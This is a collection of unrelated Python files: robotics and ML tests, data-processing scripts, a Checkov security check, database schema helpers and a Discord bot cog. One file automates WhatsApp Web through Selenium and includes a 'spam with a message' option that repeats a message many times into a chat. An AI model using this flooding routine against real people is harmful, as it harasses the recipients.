            rollbar.contrib.asgi.ReporterMiddleware.__call__.__annotations__,
            {'scope': Scope, 'receive': Receive, 'send': Send, 'return': None},
        )
11570928
import unittest

import numpy as np

import kinpy as kp


class TestFkIk(unittest.TestCase):
    def test_fkik(self):
        data = '<robot name="test_robot">'\
            '<link name="link1" />'\
            '<link name="link2" />'\
            '<link name="link3" />'\
            '<joint name="joint1" type="revolute">'\
            '<origin xyz="1.0 0.0 0.0"/>'\
            '<parent link="link1"/>'\
            '<child link="link2"/>'\
            '</joint>'\
            '<joint name="joint2" type="revolute">'\
            '<origin xyz="1.0 0.0 0.0"/>'\
            '<parent link="link2"/>'\
            '<child link="link3"/>'\
            '</joint>'\
            '</robot>'
        chain = kp.build_serial_chain_from_urdf(data, 'link3')
        th1 = np.random.rand(2)
        tg = chain.forward_kinematics(th1)
        th2 = chain.inverse_kinematics(tg)
        self.assertTrue(np.allclose(th1, th2, atol=1.0e-6))


if __name__ == "__main__":
    unittest.main()
11570932
from .mapper import ApiResponse
from .model.collection import CollectionInterface

__all__ = ['CreateCollectionResponse']


class CreateCollectionResponseInterface(CollectionInterface):
    pass


class CreateCollectionResponse(ApiResponse, CreateCollectionResponseInterface):
    pass
11570935
from rolling_grid_search import rolling_grid_search_ML
import pandas as pd
import numpy as np
from pandas import *
from numpy import *
from sklearn import svm
from sklearn.model_selection import TimeSeriesSplit, ParameterGrid
from sklearn.neighbors import KNeighborsRegressor

data = pd.read_csv("all_data.csv", skiprows=list(range(2449, 2615)))
data.set_index("DATE", inplace=True)

var_lst = data.columns.tolist()
for var in var_lst:
    data[var] = data[var].astype(float)

# Build shifted copies of every series to use as predictors.
var_lst = data.columns.tolist()
num_lags = 1
for var in var_lst:
    data[var] = data[var].astype(float)
    for lag in range(1, num_lags + 1):
        col_name = "L" + str(lag) + "." + str(var)
        data[col_name] = data[var].shift(-lag)

data.dropna(axis=0, how='any', inplace=True)


def rmse(actual, pred):
    import numpy as np
    len_lst = len(actual)
    e_2 = []
    for i in range(0, len_lst):
        e_2.append((actual[i] - pred[i]) ** 2)
    return (np.array(e_2).mean()) ** 0.5


def crit_min(score_lst):
    min_val = score_lst[0]
    min_index = 0
    counter = 0
    for score in score_lst:
        if score < min_val:
            min_index = counter
            min_val = score
        counter += 1
    return (min_index, min_val)


knnreg = KNeighborsRegressor()
param_grid = {"n_neighbors": [1, 2, 3, 4, 5], "p": [1, 2, 3, 4, 5]}

# model, X, y, param_grid, cv, scoring, crit, window_size
r = rolling_grid_search_ML(model=knnreg,
                           y=DataFrame(data["US_EU"]),
                           X=data[["L1.US_EU", "L1.US_UK"]],
                           group_size=365,
                           param_grid=param_grid,
                           scoring=rmse,
                           crit=crit_min,
                           window_size=7,
                           size_hyper_sel=30)

params_lst = r['params']
actual_lst = r['actual']
pred_lst = r['pred']

import matplotlib.pyplot as plt

params_df = DataFrame.from_dict(data=params_lst)
params_fig = params_df.plot(kind='line', title="Change in Hyperparameters", grid=False)
params_fig.set_xlabel("Group Number")
params_fig.set_ylabel("Hyperparameters")
plt.show()

pred_df = pd.DataFrame(data=[pred_lst, actual_lst])
pred_df = pred_df.transpose()
pred_df.rename(index=str, columns={0: "Prediction", 1: "Actual"}, inplace=True)
pred_fig = pred_df.plot(kind='line', title="Actual and Predicted Values", grid=False)
pred_fig.set_xlabel("Time")
pred_fig.set_ylabel("Exchange Rates")
plt.show()
11570940
from pyschema import Record, no_auto_store
from pyschema.types import Text


@no_auto_store()
class TestRecord(Record):
    _namespace = "my.namespace"
    a = Text()
11570952
from selenium import webdriver
import time

PATH = 'PATH OF CHROME DRIVER LOCATED IN YOUR MACHINE'
driver = webdriver.Chrome(PATH)
driver.get('https://web.whatsapp.com/')

print('----------------------------------------------------------------\n'
      '|               WELCOME TO WHATSAPP AUTOMATION                 |\n'
      '----------------------------------------------------------------\n')
time.sleep(10)

chatting = True
while chatting:
    time.sleep(2)
    print('OPTIONS :\n'
          '1.chat\n'
          '00.Quit')
    chat_option = input('Enter your choice : ')

    if chat_option == '1':
        select_chat = True
        time.sleep(2)
        while select_chat:
            print('---------------\n'
                  '|  ALL CHATS  |\n'
                  '---------------')
            time.sleep(2)
            all_chats = driver.find_elements_by_xpath(
                '/html/body/div/div[1]/div[1]/div[3]/div/div[2]/div[1]/div/div/div')
            for i in range(len(all_chats)):
                chatname = driver.find_element_by_xpath(
                    f'/html/body/div/div[1]/div[1]/div[3]/div/div[2]/div[1]/div/div/div[{str(i+1)}]'
                    f'/div/div/div[2]/div[1]/div[1]/span').text
                print(f' ==> {i+1} . {chatname}')
            print(f' ==> 00 . EXIT')

            option = input('\nEnter the chat index given above : ')
            time.sleep(2)
            if option != '00':
                driver.find_element_by_xpath(
                    f'/html/body/div/div[1]/div[1]/div[3]/div/div[2]/div[1]/div/div/div[{str(int(option))}]').click()
                in_chat = True
                while in_chat:
                    print('Type of messaging : \n'
                          '   choice-1 : single message\n'
                          '   choice-2 : spam with a message\n'
                          '   choice-3 : BACK TO ALL CHATS')
                    choice_in = input('Enter your choice(number) : ')
                    if choice_in == '1':
                        message = input('Enter a message : ')
                        driver.find_element_by_xpath(
                            '/html/body/div/div[1]/div[1]/div[4]/div[1]/footer/div[1]/div[2]/div/div[2]'
                        ).send_keys(f'{message} \n')
                    elif choice_in == '2':
                        message = input('Enter a message : ')
                        number = int(input('Enter No.of messages : '))
                        for i in range(number):
                            driver.find_element_by_xpath(
                                '/html/body/div/div[1]/div[1]/div[4]/div[1]/footer/div[1]/div[2]/div/div[2]'
                            ).send_keys(f'{message} \n')
                    elif choice_in == '3':
                        driver.get('https://web.whatsapp.com/')
                        in_chat = False
            else:
                select_chat = False
    else:
        chatting = False

driver.quit()
11570964
from websockets.exceptions import (
    ConnectionClosed,
    ConnectionClosedOK,
    InvalidStatusCode
)


class UnsuccessfulConnection(Exception):
    ''' Unsuccessful connection to an endpoint (e.g., ws) '''
    pass


class MaximumRetriesReached(Exception):
    ''' Maximum retries reached while fetching an endpoint '''
    pass


class UnsuccessfulDatabaseInsert(Exception):
    ''' Unsuccessful insert to db '''
    pass
11570972
import torch
from torch.utils.data import DataLoader
import pandas as pd
from tqdm import tqdm
from dataset.patch_extraction import PANDAPatchExtraction
import json

torch.backends.cudnn.benchmark = False


def main():
    tiff_dir = SETTINGS['RAW_DATA_DIR'] + "train_images/"
    mask_dir = SETTINGS['RAW_DATA_DIR'] + "train_label_masks/"
    df = pd.read_csv(SETTINGS["CSV_PATH"])
    suspicious = pd.read_csv(SETTINGS["SUSPICIOUS_PATH"]).image_id
    df = df[~df.image_id.isin(suspicious)]

    dataset = PANDAPatchExtraction(df,
                                   tiff_dir,
                                   mask_dir,
                                   # Patch parameters
                                   patch_size=192,
                                   bg_threshold=0.95,
                                   trail_offset=[0, 1 / 2],
                                   # Augmentation & Normalization
                                   mean=(0.485, 0.456, 0.406),
                                   std=(0.229, 0.224, 0.225),
                                   )
    dataloader = DataLoader(dataset, batch_size=1, shuffle=False, num_workers=8)

    result_metadata = dict()
    for images, coords, img_id, patch_labels, ignore_mask, best_offset in tqdm(dataloader):
        img_id = img_id[0]
        result_metadata[img_id] = best_offset.item()
    # print(result_metadata)

    with open(SETTINGS["LEVEL0_JSON_DIR"] + "Validation_mode.json", "w+") as f:
        json.dump(result_metadata, f)


with open("./SETTINGS.json") as f:
    SETTINGS = json.load(f)

if __name__ == "__main__":
    main()
11570986
from attrdict import AttrDict

config = AttrDict()

config.log_path = '/rebryk/kaggle/protein/logs'
config.data_path = '/rebryk/kaggle/protein/dataset'
config.model_path = '/rebryk/kaggle/protein/models'
config.submission_path = '/rebryk/kaggle/protein/submissions'
config.tensorboard_path = '/rebryk/logs'

config.exp = 'test'
config.model = 'resnet50'

config.num_workers = 8
config.batch_size = 32
config.image_size = 512

config.lr = None
config.num_epochs = None
config.cycles_len = None
config.lr_divs = None

config.test_size = 0.1
config.k_fold = 5

config.external_data = False
config.use_sampler = True
config.mixed_precision = False

config.checkpoint = 'stage_2_sz512_x32_f{}_06'

config.n_aug_train = 0
config.n_aug_test = 8
11570987
import h5py
import numpy as np
from pathlib import Path
import warnings

"""
Code to transform the original dataset into a form that has faster data IO.
This is especially important for non-SSD storage.
For most systems, File I/O is the bottleneck for training speed.
"""


def check_chunk_size(data, chunk, file):
    mb = 2 ** 20  # megabyte
    chunk_bytes = np.prod(chunk) * data.itemsize
    if chunk_bytes > mb:
        warnings.warn(f'kspace chunk size for {file} is greater than 1MB. '
                      f'Specified chunk size is {chunk_bytes} for chunk configuration of {chunk}. '
                      f'Please reconsider chunk size configurations. '
                      f'A chunk size greater than 1MB cannot utilize HDF5 caching by default.')


def make_compressed_dataset(data_folder, save_dir, **save_params):
    data_path = Path(data_folder)
    files = data_path.glob('*.h5')
    save_path = Path(save_dir)
    save_path.mkdir(exist_ok=True)
    save_path = save_path / data_path.stem
    save_path.mkdir()

    for file in sorted(files):
        print(f'Processing {file}')
        with h5py.File(file, mode='r') as old_hf:
            attrs = dict(old_hf.attrs)
            kspace = np.asarray(old_hf['kspace'])

            # Chunk size should be below 1M for cache utilization. Complex data is 8 bytes.
            # E.g. a multi-coil slice chunk of (1, 1, 160, 368) is 160 * 368 * 8 = 471,040 bytes,
            # safely under 1 MiB.
            if kspace.ndim == 3:  # Single-coil case
                chunk = (1, kspace.shape[-2] // 4, kspace.shape[-1])  # dim=-2 is always 640 for fastMRI.
                recons_key = 'reconstruction_esc'
            elif kspace.ndim == 4:  # Multi-coil case
                chunk = (1, 1, kspace.shape[-2] // 4, kspace.shape[-1])
                recons_key = 'reconstruction_rss'
            else:
                raise TypeError('Invalid dimensions of input k-space data')

            test_set = recons_key not in old_hf.keys()
            if test_set:
                mask = old_hf['mask'][()]
                attrs.update({'mask': mask})
                labels = None
            else:
                labels = np.asarray(old_hf[recons_key])

        check_chunk_size(kspace, chunk, file)

        with h5py.File(save_path / file.name, mode='x', libver='latest') as new_hf:
            new_hf.attrs.update(attrs)
            new_hf.create_dataset('kspace', data=kspace, chunks=chunk, **save_params)
            if not test_set:
                new_hf.create_dataset(recons_key, data=labels, chunks=(1, 320, 320), **save_params)


def check_same(old_folder, new_folder):
    old_path = Path(old_folder)
    new_path = Path(new_folder)
    old_paths = list(old_path.glob('*.h5'))
    old_paths.sort()
    new_paths = list(new_path.glob('*.h5'))
    new_paths.sort()

    assert len(old_paths) == len(new_paths)

    for old, new in zip(old_paths, new_paths):
        assert old.name == new.name, 'Name is not the same.'
        print(f'Checking {new}')
        with h5py.File(old, mode='r') as old_hf, h5py.File(new, mode='r') as new_hf:
            assert dict(new_hf.attrs) == dict(old_hf.attrs)
            for key in new_hf.keys():
                assert np.all(np.asarray(old_hf[key]) == np.asarray(new_hf[key]))
    else:
        print('All is well!')


def make_compressed_test_dataset(data_folder, save_dir, **save_params):
    data_path = Path(data_folder)
    files = data_path.glob('*.h5')
    save_path = Path(save_dir)
    save_path.mkdir(exist_ok=True)
    save_path = save_path / data_path.stem
    save_path.mkdir()

    for file in sorted(files):
        print(f'Processing {file}')
        with h5py.File(file, mode='r') as old_hf:
            attrs = dict(old_hf.attrs)
            kspace = np.asarray(old_hf['kspace'])
            mask = old_hf['mask'][()]
            attrs.update({'mask': mask})

            # Chunk size should be below 1M for cache utilization. Complex data is 8 bytes.
            if kspace.ndim == 3:  # Single-coil case
                chunk = (1, kspace.shape[-2] // 4, kspace.shape[-1])  # dim=-2 is always 640 for fastMRI.
            elif kspace.ndim == 4:  # Multi-coil case
                chunk = (1, 1, kspace.shape[-2] // 4, kspace.shape[-1])
            else:
                raise TypeError('Invalid dimensions of input k-space data')

        check_chunk_size(kspace, chunk, file)

        with h5py.File(save_path / file.name, mode='x', libver='latest') as new_hf:
            new_hf.attrs.update(attrs)
            new_hf.create_dataset('kspace', data=kspace, chunks=chunk, **save_params)


if __name__ == '__main__':
    # train_dir = '/media/veritas/E/fastMRI/multicoil_train'
    # val_dir = '/media/veritas/E/fastMRI/multicoil_val'
    test_dir = '/media/veritas/E/fastMRI/singlecoil_test_v2'
    # challenge_dir = '/media/veritas/E/fastMRI/multicoil_challenge'

    data_root = '/media/veritas/D/FastMRI_'  # Compressed Fast MRI Dataset
    data_path_ = Path(data_root)

    # For floating point values, I have found that gzip level 1 and 9 give almost the same compression.
    # I have not checked whether this is also true for complex numbers but I presume this here.
    # I have found that gzip with level 1 is almost the same as gzip level 9 for complex data
    # when used with the shuffle filter. They both reduce the data by about half.
    # The differences are not great enough to justify the extra computational cost of higher gzip levels.
    # The differences do justify using gzip over lzf, however.
    kwargs = dict(compression='gzip', compression_opts=1, shuffle=True, fletcher32=False)
    # kwargs = dict(compression='lzf', shuffle=True)

    # Use compression if storing on hard drive, not SSD.
    # make_compressed_dataset(train_dir, data_root, **kwargs)
    # make_compressed_dataset(val_dir, data_root, **kwargs)
    make_compressed_test_dataset(test_dir, data_root, **kwargs)
    # make_compressed_test_dataset(challenge_dir, data_root, **kwargs)

    # check_same(train_dir, data_path_ / 'new_singlecoil_train')
    # check_same(val_dir, data_path_ / 'new_singlecoil_val')
    # check_same(test_dir, data_path_ / 'new_singlecoil_test')
11571072
from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck
from checkov.common.models.enums import CheckCategories


class GKENetworkPolicyEnabled(BaseResourceValueCheck):
    def __init__(self):
        name = "Ensure Network Policy is enabled on Kubernetes Engine Clusters"
        id = "CKV_GCP_12"
        supported_resources = ['google_container_cluster']
        categories = [CheckCategories.KUBERNETES]
        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)

    def get_inspected_key(self):
        """
        Looks for the network policy configuration on google_container_cluster:
        https://www.terraform.io/docs/providers/google/r/container_cluster.html
        :return: path of the inspected key
        """
        return 'network_policy/[0]/enabled'


check = GKENetworkPolicyEnabled()
11571113
import torch

from registry import registry
from eval_settings.eval_setting_base import EvalSetting, StandardDataset, accuracy_topk
from eval_settings.eval_setting_subsample import class_sublist_1_8

registry.add_eval_setting(
    EvalSetting(
        name='val',
        dataset=StandardDataset(name='val'),
        size=50000,
    )
)


def accuracy_topk_subselected(logits, targets):
    targets = torch.tensor([class_sublist_1_8.index(x) for x in targets])
    return accuracy_topk(logits, targets)


idx_subsample_list = [range(x * 50, (x + 1) * 50) for x in class_sublist_1_8]
idx_subsample_list = sorted([item for sublist in idx_subsample_list for item in sublist])

registry.add_eval_setting(
    EvalSetting(
        name='val_subsampled_class_1_8',
        dataset=StandardDataset(name='val'),
        size=6250,
        class_sublist=class_sublist_1_8,
        metrics_fn=accuracy_topk_subselected,
        idx_subsample_list=idx_subsample_list,
    )
)
11571130
def main():
    if a := 1:
        print(a)
    if c := "":
        print(c)
    if d := b"":
        print(d)
    if e := "Hello":
        print(e)
    if f := b"Goodbye":
        print(f)
    if g := 1.0:
        print(g)
    if h := 1j:
        print(h)
    if i := 0.0:
        print(i)
    if j := 0j:
        print(j)
    if k := []:
        print(k)
    if l := [1, 2, 3]:
        print(l)
    if m := True:
        print(m)
    if n := False:
        print(n)
    if o := ():
        print(o)
    if p := (1, 2, 3):
        print(p)
    if q := set():
        print(q)
    if r := {1, 2, 3}:
        print(r)
    if s := {}:
        print(s)
    if t := {1: 2}:
        print(t)


if __name__ == '__main__':
    main()
11571146
from optimus.tests.base import TestBase


class TestLoadPandas(TestBase):

    def test_json(self):
        df = self.load_dataframe("examples/data/foo.json", type="json", multiline=True)
        self.assertEqual(df.rows.count(), 19)
        self.assertEqual(df.cols.names(), ["id", "firstName", "lastName", "billingId",
                                           "product", "price", "birth", "dummyCol"])
        if "n_partitions" in self.config:
            self.assertEqual(self.config["n_partitions"], df.partitions())

    def test_json_less_rows(self):
        df = self.load_dataframe("examples/data/foo.json", type="json", n_rows=13)
        self.assertEqual(df.rows.count(), 13)
        self.assertEqual(df.cols.names(), ["id", "firstName", "lastName", "billingId",
                                           "product", "price", "birth", "dummyCol"])
        if "n_partitions" in self.config:
            self.assertEqual(self.config["n_partitions"], df.partitions())

    def test_json_more_rows(self):
        df = self.load_dataframe("examples/data/foo.json", type="json", n_rows=50)
        self.assertLess(df.rows.count(), 50)
        self.assertEqual(df.cols.names(), ["id", "firstName", "lastName", "billingId",
                                           "product", "price", "birth", "dummyCol"])
        if "n_partitions" in self.config:
            self.assertEqual(self.config["n_partitions"], df.partitions())

    def test_xml(self):
        df = self.load_dataframe("examples/data/foo.xml", type="xml")
        self.assertEqual(df.rows.count(), 19)
        self.assertEqual(df.cols.names(), ["id", "firstName", "lastName", "billingId",
                                           "product", "price", "birth", "dummyCol"])
        if "n_partitions" in self.config:
            self.assertEqual(self.config["n_partitions"], df.partitions())

    def test_xml_less_rows(self):
        df = self.load_dataframe("examples/data/foo.xml", type="xml", n_rows=13)
        self.assertEqual(df.rows.count(), 13)
        self.assertEqual(df.cols.names(), ["id", "firstName", "lastName", "billingId",
                                           "product", "price", "birth", "dummyCol"])
        if "n_partitions" in self.config:
            self.assertEqual(self.config["n_partitions"], df.partitions())

    def test_xml_more_rows(self):
        df = self.load_dataframe("examples/data/foo.xml", type="xml", n_rows=50)
        self.assertLess(df.rows.count(), 50)
        self.assertEqual(df.cols.names(), ["id", "firstName", "lastName", "billingId",
                                           "product", "price", "birth", "dummyCol"])
        if "n_partitions" in self.config:
            self.assertEqual(self.config["n_partitions"], df.partitions())

    def test_parquet(self):
        df = self.load_dataframe("examples/data/foo.parquet", type="parquet")
        self.assertEqual(df.rows.count(), 19)
        self.assertEqual(df.cols.names(), ["id", "firstName", "lastName", "billingId",
                                           "product", "price", "birth", "dummyCol"])
        if "n_partitions" in self.config:
            self.assertEqual(self.config["n_partitions"], df.partitions())

    def test_parquet_less_rows(self):
        df = self.load_dataframe("examples/data/foo.parquet", type="parquet", n_rows=13)
        self.assertEqual(df.rows.count(), 13)
        self.assertEqual(df.cols.names(), ["id", "firstName", "lastName", "billingId",
                                           "product", "price", "birth", "dummyCol"])
        if "n_partitions" in self.config:
            self.assertEqual(self.config["n_partitions"], df.partitions())

    def test_parquet_more_rows(self):
        df = self.load_dataframe("examples/data/foo.parquet", type="parquet", n_rows=50)
        self.assertLess(df.rows.count(), 50)
        self.assertEqual(df.cols.names(), ["id", "firstName", "lastName", "billingId",
                                           "product", "price", "birth", "dummyCol"])
        if "n_partitions" in self.config:
            self.assertEqual(self.config["n_partitions"], df.partitions())

    def test_avro(self):
        df = self.load_dataframe("examples/data/foo.avro", type="avro")
        self.assertEqual(df.rows.count(), 19)
        self.assertEqual(df.cols.names(), ["id", "firstName", "lastName", "billingId",
                                           "product", "price", "birth", "dummyCol"])
        if "n_partitions" in self.config:
            self.assertEqual(self.config["n_partitions"], df.partitions())

    def test_avro_less_rows(self):
        df = self.load_dataframe("examples/data/foo.avro", type="avro", n_rows=13)
        self.assertEqual(df.rows.count(), 13)
        self.assertEqual(df.cols.names(), ["id", "firstName", "lastName", "billingId",
                                           "product", "price", "birth", "dummyCol"])
        if "n_partitions" in self.config:
            self.assertEqual(self.config["n_partitions"], df.partitions())

    def test_avro_more_rows(self):
        df = self.load_dataframe("examples/data/foo.avro", type="avro", n_rows=50)
        self.assertLess(df.rows.count(), 50)
        self.assertEqual(df.cols.names(), ["id", "firstName", "lastName", "billingId",
                                           "product", "price", "birth", "dummyCol"])
        if "n_partitions" in self.config:
            self.assertEqual(self.config["n_partitions"], df.partitions())

    def test_tsv(self):
        df = self.load_dataframe("examples/data/foo.tsv", type="tsv")
        self.assertEqual(df.rows.count(), 5)
        self.assertEqual(df.cols.names(), ["Sepal length", "Sepal width", "Petal length",
                                           "Petal width", "Species"])
        if "n_partitions" in self.config:
            self.assertEqual(self.config["n_partitions"], df.partitions())

    def test_tsv_less_rows(self):
        df = self.load_dataframe("examples/data/foo.tsv", type="tsv", n_rows=3)
        self.assertEqual(df.rows.count(), 3)
        self.assertEqual(df.cols.names(), ["Sepal length", "Sepal width", "Petal length",
                                           "Petal width", "Species"])
        if "n_partitions" in self.config:
            self.assertEqual(self.config["n_partitions"], df.partitions())

    def test_tsv_more_rows(self):
        df = self.load_dataframe("examples/data/foo.tsv", type="tsv", n_rows=50)
        self.assertLess(df.rows.count(), 50)
        self.assertEqual(df.cols.names(), ["Sepal length", "Sepal width", "Petal length",
                                           "Petal width", "Species"])
        if "n_partitions" in self.config:
            self.assertEqual(self.config["n_partitions"], df.partitions())

    def test_xls(self):
        df = self.load_dataframe("examples/data/titanic3.xls", type="excel")
        self.assertEqual(df.rows.count(), 1309)
        self.assertEqual(df.cols.names(), ["pclass", "survived", "name", "sex", "age",
                                           "sibsp", "parch", "ticket", "fare", "cabin",
                                           "embarked", "boat", "body", "home.dest"])
        if "n_partitions" in self.config:
            self.assertEqual(self.config["n_partitions"], df.partitions())

    def test_xls_less_rows(self):
        df = self.load_dataframe("examples/data/titanic3.xls", type="excel", n_rows=13)
        self.assertEqual(df.rows.count(), 13)
        self.assertEqual(df.cols.names(), ["pclass", "survived", "name", "sex", "age",
                                           "sibsp", "parch", "ticket", "fare", "cabin",
                                           "embarked", "boat", "body", "home.dest"])
        if "n_partitions" in self.config:
            self.assertEqual(self.config["n_partitions"], df.partitions())

    def test_xls_more_rows(self):
        df = self.load_dataframe("examples/data/titanic3.xls", type="excel", n_rows=50)
        self.assertLess(df.rows.count(), 5000)
        self.assertEqual(df.cols.names(), ["pclass", "survived", "name", "sex", "age",
                                           "sibsp", "parch", "ticket", "fare", "cabin",
                                           "embarked", "boat", "body", "home.dest"])
        if "n_partitions" in self.config:
            self.assertEqual(self.config["n_partitions"], df.partitions())


class TestLoadDask(TestLoadPandas):
    config = {'engine': 'dask'}


class TestLoadPartitionDask(TestLoadPandas):
    config = {'engine': 'dask', 'n_partitions': 2}


try:
    import cudf  # pyright: reportMissingImports=false
except:
    pass
else:
    class TestLoadCUDF(TestLoadPandas):
        config = {'engine': 'cudf'}


try:
    import dask_cudf  # pyright: reportMissingImports=false
except:
    pass
else:
    class TestLoadDC(TestLoadPandas):
        config = {'engine': 'dask_cudf'}


try:
    import dask_cudf  # pyright: reportMissingImports=false
except:
    pass
else:
    class TestLoadPartitionDC(TestLoadPandas):
        config = {'engine': 'dask_cudf', 'n_partitions': 2}


try:
    import pyspark
except:
    pass
else:
    class TestLoadSpark(TestLoadPandas):
        config = {'engine': 'spark'}


try:
    import vaex
except:
    pass
else:
    class TestLoadVaex(TestLoadPandas):
        config = {'engine': 'vaex'}
11571147
from __future__ import absolute_import

from sqlalchemy import MetaData
import six

from ..db import db


class DialectOperations(object):
    dialect_map = {}
    option_defaults = None

    def __init__(self, engine, bind_name, options=None):
        # this engine is tied to a particular "bind"; use it instead of db.engine
        self.engine = engine
        self.bind_name = bind_name
        self.assign_options(options or {})

    def assign_options(self, option_pairs):
        if not self.option_defaults:
            return
        for option_key in self.option_defaults.keys():
            full_key = '{}.{}'.format(self.dialect_name, option_key)
            attr_name = 'opt_{}'.format(option_key)
            default_opt_value = self.option_defaults[option_key]
            opt_value = option_pairs.get(full_key, default_opt_value)
            setattr(self, attr_name, opt_value)

    def execute_sql(self, statements):
        for sql in statements:
            self.engine.execute(sql)

    def create_all(self):
        self.create_schemas()
        db.create_all(bind=self.bind_name)

    def create_schemas(self):
        pass

    @classmethod
    def create_for(cls, engine, bind_name, options):
        dialect_name = engine.dialect.name
        if dialect_name in cls.dialect_map:
            cls = cls.dialect_map[dialect_name]
            return cls(engine, bind_name, options)
        else:
            raise Exception('DialectOperations does not yet support the "{}" database.'
                            .format(dialect_name))

    def on_connect(self, dbapi_connection, connection_record):
        pass


class PostgreSQLOps(DialectOperations):
    dialect_name = 'postgresql'
    option_defaults = {'schemas': ('public',)}

    def create_schemas(self):
        sql = []
        connection_user = self.engine.url.username
        for schema in self.opt_schemas:
            sql.extend([
                f'CREATE SCHEMA IF NOT EXISTS "{schema}" AUTHORIZATION "{connection_user}";',
                f'GRANT ALL ON SCHEMA "{schema}" TO "{connection_user}";',
            ])
        self.execute_sql(sql)

    def create_all(self):
        self.create_schemas()
        super().create_all()

    def drop_all(self):
        sql = []
        for schema in self.opt_schemas:
            sql.extend([
                'DROP SCHEMA IF EXISTS "{}" CASCADE;'.format(schema),
            ])
        self.execute_sql(sql)


DialectOperations.dialect_map['postgresql'] = PostgreSQLOps


class SQLiteOps(DialectOperations):
    dialect_name = 'sqlite'

    def on_connect(self, dbapi_connection, connection_record):
        # Want SQLite to use foreign keys
        # todo: if this becomes undesirable for some reason, we can make it an option.
        cursor = dbapi_connection.cursor()
        cursor.execute("PRAGMA foreign_keys=ON")
        cursor.close()

    def drop_all(self):
        # drop the views
        sql = "select name from sqlite_master where type='view'"
        rows = self.engine.execute(sql)
        drop_sql = ['drop view {0}'.format(record['name']) for record in rows]
        self.execute_sql(drop_sql)

        # Find all the tables using metadata and reflection. Use a custom MetaData instance to
        # avoid contaminating the metadata associated with our entities.
        md = MetaData(bind=self.engine)
        md.reflect()
        for table in reversed(md.sorted_tables):
            try:
                self.engine.execute('drop table {}'.format(table.name))
            except Exception as e:
                if 'no such table' not in str(e):
                    raise


DialectOperations.dialect_map['sqlite'] = SQLiteOps


class MicrosoftSQLOps(DialectOperations):
    dialect_name = 'mssql'
    option_defaults = {'schemas': tuple()}

    def drop_all(self):
        # generate drops for all objects, being careful of the schema the object belongs to
        mapping = {
            'P': 'drop procedure [{schema_name}].[{name}]',
            'C': 'alter table [{schema_name}].[{parent_name}] drop constraint [{name}]',
            ('FN', 'IF', 'TF'): 'drop function [{schema_name}].[{name}]',
            'V': 'drop view [{schema_name}].[{name}]',
            'F': 'alter table [{schema_name}].[{parent_name}] drop constraint [{name}]',
            'U': 'drop table [{schema_name}].[{name}]',
        }
        delete_sql = []
        for type, drop_sql in six.iteritems(mapping):
            sql = 'select name, object_name( parent_object_id ) as parent_name '\
                  ', OBJECT_SCHEMA_NAME(object_id) as schema_name '\
                  'from sys.objects where type in (\'{}\')'.format("', '".join(type))
            rows = self.engine.execute(sql)
            for row in rows:
                delete_sql.append(drop_sql.format(**dict(row)))

        # removing schemas can be tricky. SQL Server 2016+ supports DROP SCHEMA IF EXISTS ...
        # syntax, but we need to support earlier versions. Technically, an IF EXISTS(...) DROP
        # SCHEMA should work, but testing shows the drop never happens when executed in this
        # fashion. So, query sys.schemas directly, and drop any schemas that we are interested
        # in (according to the bind opts)
        schema_sql = 'select name from sys.schemas'
        rows = self.engine.execute(schema_sql)
        for row in rows:
            if row.name in self.opt_schemas:
                delete_sql.append('drop schema {}'.format(row.name))

        # all drops should be in order, execute them all
        self.execute_sql(delete_sql)

    def create_schemas(self):
        sql = []
        for schema in self.opt_schemas:
            # MSSQL has to run CREATE SCHEMA as its own batch.
            # So, we can't use an IF NOT EXISTS at the same time. Test first, then create.
            existing = self.engine.execute(
                "SELECT COUNT(*) FROM sys.schemas WHERE name = N'{}'".format(schema)
            ).scalar()
            if not existing:
                sql.extend([
                    'CREATE SCHEMA {}'.format(schema),
                ])
        self.execute_sql(sql)


DialectOperations.dialect_map['mssql'] = MicrosoftSQLOps
11571148
import arboretum
import numpy as np
from sklearn.datasets import load_boston
import json
import pytest
import utils


@pytest.mark.parametrize("double_precision", [True, False])
@pytest.mark.parametrize("method", ['hist', 'exact'])
@pytest.mark.parametrize("hist_size", [12, 15, 16, 31, 32, 63, 64, 127, 128,
                                       255, 256, 511, 512, 1023])
def test_single_tree(double_precision, method, hist_size,
                     y_pred=[[21.833334, 21.833334, 33.25, 33.25, 33.25,
                              33.25, 21.833334, 21.833334, 21.833334, 21.833334]]):
    boston = load_boston()
    n = 10

    data = arboretum.DMatrix(boston.data[0:n], y=boston.target[0:n])
    y = boston.target[0:n]

    model = arboretum.ArboretumRegression(
        max_depth=1,
        learning_rate=0.99999,
        n_estimators=1,
        verbosity=0,
        gamma_absolute=0.0,
        gamma_relative=0.0,
        min_child_weight=1.0,
        min_leaf_size=1,
        max_leaf_weight=0,
        colsample_bytree=1.0,
        colsample_bylevel=1.0,
        l1=0,
        l2=0,
        scale_pos_weight=1.0,
        initial_y=0.5,
        seed=0,
        double_precision=double_precision,
        method=method,
        hist_size=hist_size)

    model.fit(data, y)
    pred = model.predict(data)
    print(pred)
    print(y_pred)
    assert np.allclose(pred, y_pred)
11571167
from validation import vworkspace

with vworkspace() as w:
    w.props.memory_effects_only = False
    w.fun.main.validate_phases("privatize_module",
                               "internalize_parallel_code",
                               "localize_declaration")
11571186
import discord
from discord.ext import commands

import asyncio

import utils


class Moderation(metaclass=utils.MetaCog, colour=0xffd0b5, thumbnail='https://i.imgur.com/QJiga6E.png'):
    """Nothing like a good spanking! These commands should give your mods a good feeling inside.

    Most of these commands require, [Manage Server] permissions.
    """

    def __init__(self, bot):
        self.bot = bot

    async def __local_check(self, ctx):
        if ctx.invoked_with == 'help':
            return True

        if not ctx.guild:
            raise commands.NoPrivateMessage
        return True

    async def __error(self, ctx, error):
        if isinstance(error, commands.NoPrivateMessage):
            try:
                await ctx.send('This command can not be used in DMs.')
            except discord.HTTPException:
                pass
        elif isinstance(error, commands.MissingRequiredArgument):
            await ctx.send(f'`{error.param.name}` is a required argument which is missing.')

    @commands.command(name='prefix', cls=utils.AbstractorGroup, abstractors=['add', 'remove', 'list'])
    async def prefix(self, ctx):
        """Prefix related commands.

        <This Group implements Base Commands>
        !Base commands are also sub commands!

        Base Commands
        ---------------
            add
            remove
            list

        Examples
        ----------
        <prefix>prefix add <custom_prefix>
        <prefix>remove prefix <custom_prefix>

            {ctx.prefix}prefix list
            {ctx.prefix}prefix remove "eviee pls "
        """

    @prefix.command(name='add')
    @commands.has_permissions(manage_guild=True)
    async def add_prefix(self, ctx, *, prefix: str):
        """Assign a Prefix to Eviee for use in your guild.

        Examples
        ----------
        <prefix>prefix add <custom_prefix>
        <prefix>add prefix <custom_prefix>

